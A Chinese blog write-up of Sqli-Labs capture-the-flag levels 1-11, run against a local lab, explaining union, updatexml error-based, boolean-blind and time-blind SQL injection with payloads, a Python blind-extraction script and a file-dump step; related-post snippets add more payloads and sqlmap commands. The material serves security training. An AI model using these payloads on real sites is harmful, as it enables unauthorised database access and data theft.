CTF之Sqli-Labs题目解析(1-11题)

最新推荐文章于 2024-04-27 08:59:52 发布
最新推荐文章于 2024-04-27 08:59:52 发布
阅读量1.2k 收藏 4
点赞数
分类专栏: ctf 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a690135443/article/details/106729202
版权

第一题

提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。

改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。

改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合。这里双引号不报错的原因是mysql在执行查询的时候会做一个类型转换,1”会转换为1,mysql测试一下。

所以刚才双引号回显正常。

继续刚才的步骤,加上注释之后,错误也消失了,所以在这个时候可以union select了。

然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。

然后使用union select 1,2,3 知道字段值对应的回显位置。

可以看到,子查询中第二个字段的位置对应name的位置,第三个字段的位置对应password的位置。

然后用select group_concat(table_name) from information_schema.tables where table_schema = database()爆表名

用select group_concat(column_name) from information_schema.columns where table_name = XXX爆列名即可,其中XXX为上一步爆出的表名,如图

第二题

添加单引号和双引号都报错,所以可以判断为数字类型,直接union select并添加注释

然后information_schema爆库即可

第三题

单引号报错,双引号正常,说明是单引号闭合。

加order by测字段数又报错,发现需要闭合括号

添加括号果然正确,看一下后台sql:

果然是需要括号闭合的,后面步骤不再重复了。

第四题

与上一题类似,只不过单引号+括号闭合变成了双引号+括号闭合。

后台看一下sql语句

第五题

单引号闭合错误,双引号闭合正常,说明需要单引号闭合,加上注释后回显正常,用id=-1 union select 1,2,3测试回显位发现无论什么数据都会是同样的页面

考虑使用报错注入。

一般使用updatexml这个函数进行报错注入

原理就是利用updatexml这个函数,可以看一下mysql中关于updatexml函数的用法(help 函数名),大意就是从第一个参数xml_target中找到匹配第二个参数的语句,替换为第三个参数的语句。


构造payload如下:

这里在updatexml中间的参数构造爆表名的语句,而这个语句是不符合xpath语法的。而使用0x7e的原因是mysql在输出错误信息时,只打印特殊符号之后的信息。0x7e在ascii中表示为~,这样就会爆出两个0x7e之间的错误信息,这里可以看到,成功爆出表名。

后台看一下php逻辑

可以看到,只要构造的sql语句可以查出数据,就会输出You are in......这句话,而不会在页面上有其他的显示。而sql出错的话,会直接在页面上打印错误信息。

第六题

与第五题类似,只不过单引号闭合换成了双引号闭合。

第七题

题目提示使用dump file,由于mac上面没找到合适的shell工具,所以只能尝试到写入文件这一步。

可以看到,虽然报错了,但是文件已经写入到目录里了,apache的目录结构是”/var/www/html“,一开始没能写入是因为linux下面mysql用户没有html这个目录的权限,chmod 777 html改一下权限即可。

第八题

单引号闭合,无回显位,无报错信息,考虑使用布尔盲注,用substring逐个字符测试名字。

import requests
from string import Template

url2 = "http://localhost:8888/Less-8/?id=1' and substring((select group_concat(table_name) from information_schema.tables where table_schema = database()),${s1},1) = '${s2}' --+"

length = 0

#for i in range(0,20):
#    r = requests.get(Template(url1).substitute(s1=i))
#    if "You are in" in r.text:
#        length =  i

dic = 'abcdefghijklmnopqrstuvwxyz1234567890_,'
name = ""

for i in range(1,50):
    for j in range(0,len(dic)):
        url = Template(url2).substitute(s1=i,s2=dic[j])
        r = requests.get(url)
        if "You are in" in r.text:
            name += dic[j]

print(name)

 脚本运行结果

列明和字段同理,替换成相应的select语句即可。

第九题

不管输入什么参数,页面回显都一样,加上题目提示time based,遂采用时间盲注。先直接用id=1' and sleep(5) --+测试,发现直接就sleep了,所以是单引号闭合。然后用if函数搭配sleep()函数,如果if函数第一个表达式正确,就执行第二个表达式,也就是sleep函数,睡眠一段时间,否则执行第三个表达式。

由于sqli-labs环境搭建在本机的docker里,所以sleep(1)秒即可发现明显差别,当然具体的判断语句和之前一样。

第十题

和第九题一样,只不过单引号闭合改成了双引号闭合,思路是完全相同的。

第十一题

之前的题目都是GET方式的请求,第11题开始变成了POST方式的请求,不过大同小异,换成Burp拦截看一下。

尝试修改uname参数,结果直接成功

z11h
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-sqli-labs
Leo8283的博客
04-20 657
CTFshow sql-labs刷记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
青少年CTF平台---sqli-labs
t235336456的博客
11-30 453
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候返回错误信息。
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
Innocence_0的博客
04-27 1115
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
sqli-labs buuctf平台+本地环境 全关全解 不是很详解(<_<)
weixin_48083470的博客
07-12 1881
sqli-labs 在buuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 写python代码来跑出内容 import requests url
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6440
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
CTFHub闯关之SQL注入
m0_60716947的博客
05-01 3426
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 CTFHub 地址:CTFHub CTF.
sqli-labs-php7-master.zip
04-06
SQL注入攻防演练平台——sqli-labs-php7-master》 在网络安全领域,CTF(Capture The Flag)比赛是一种常见的技术竞技形式,它旨在提升参赛者的网络安全技能,特别是对于Web安全的理解。在这个背景下,"sqli-labs...
SQLi-LABS Page-1(Basic Challenges)
07-24
在"SQLi-LABS Page-1 (Basic Challenges)"中,一系列的关卡设计用于帮助学习者理解并实践SQL注入的基本概念和方法。 在CTF(Capture The Flag)网络安全挑战赛中,SQL注入是一种常见的技能测试。在这个挑战中,从...
SQLi-CTF-master.zip
04-09
- 在CTF比赛中,SQLi题目通常要求参赛者通过注入获取特定的数据,如数据库中的密码、隐藏文件路径或其他关键信息。 - 解决SQLi问可能需要结合Web应用的逻辑和数据库结构,以及对不同数据库系统的了解。 综上所...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
ctf-all-in-one
01-30
ctf-all-in-one
最详细sqli-labs平台前十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 2781
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
ctfshow web入门 sqli-labs(持续更新)
Lum1n0us's Blog
04-14 1784
文章目录web517-1web518-2web519-3web520-4web521-5web522-6web523-7web524-8web525-9web526-10web527-11web528-12web529-13web530-14web531-15web532-16web533-17web534-18web535-19web536-20web537-21web538-22web539-23 web517-1 ctfshow的sqli-labs和本地搭建最大的不同,就是show的flag不在当前的
“百度杯”CTF比赛 九月场SQLi(多种姿势)
u011250160的博客
04-04 407
进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
百度杯”CTF比赛 九月场 SQLi
weixin_43858799的博客
05-19 741
1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路 2、根据提示flag在后台 用bp抓包进行测试 看到 login.php?id=1 通过URL进行访问 发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息 最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示 通过URL访问...
ctf-writeup-迎圣诞拿大奖-SQLi
key_nothing的博客
08-06 346
打开连接,出现一个登录框: 尝试:扫目录、弱口令、源代码都没有什么发现 题目sqli 猜测sql注入应该在登录处,转包丢sqlmap先跑一发,也没有结果。 尝试手工测一下,发现在用户名处输入%时居然有报错! 看报错提示,有sprintf()错误,瞬间想起了这个函数有格式化字符串漏洞,抓包尝试一番。 sprintf注入,或者说php格式化字符串注入的原理为: 要明白%后的一个字符(除了%,%...
“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3843
今天在i春秋做的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
“百度杯”CTF比赛 九月场 SQLi 解思路
****的博客
10-15 1118
题目简介 题目名称:SQLi 题目内容:后台有获取flag的线索 解思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1560
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
SQLi-LABS基础挑战解析:1-22关攻略
本文档涵盖了第一部分的基础挑战,从 Less-1 到 Less-22,适合网络安全初学者和 CTF 玩家。通过这些关卡,你可以了解和掌握 SQL 注入的基本技巧和工具,例如使用 sqlmap。" 在 SQLi-LABS 的基础挑战中,我们首先...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值